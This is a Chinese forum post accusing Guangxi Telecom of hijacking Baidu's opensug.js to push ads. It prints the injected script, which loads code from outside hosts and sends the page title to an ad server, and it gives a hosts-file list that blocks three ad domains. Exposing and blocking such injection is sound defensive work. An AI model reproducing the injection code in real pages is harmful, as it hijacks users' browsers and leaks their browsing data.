证据曝光广西电信 强制弹窗代码 如何实现JS广告的?劫持百度搜索opensug.js 黑心电信
插入了一个js,然后文件名是正常的opensug.js 其内容为document.write("<script language='javascript' src='http://att.itzmx.com/1/opensug.js?_vv=20080808'></script>");document.write("<script language='javascript' src='http://p.ywbmh.com:7777/pt/pt.php?src=p0007&t="+encodeURIComponent(document.title)+"&ci=3029101464'></script>");,原来本身的js重命名了opensug.js?_vv=20080808
证据曝光,这段代码被植入网站并不是服务器漏洞等问题,是运营商搞的鬼。
C:\Windows\system32\drivers\etc
建议在hosts下加入如下,均为电信公司的广告弹窗域名
127.0.0.1 p.ywbmh.com
127.0.0.1 p.ubt123.com
127.0.0.1 p.haolew.com 2015年9月11日新增
问:你说我把opensug.js文件名改了,还会被电信劫持么?
答:并不会解决的,没救,看到了劫持其他js了
页:
[1]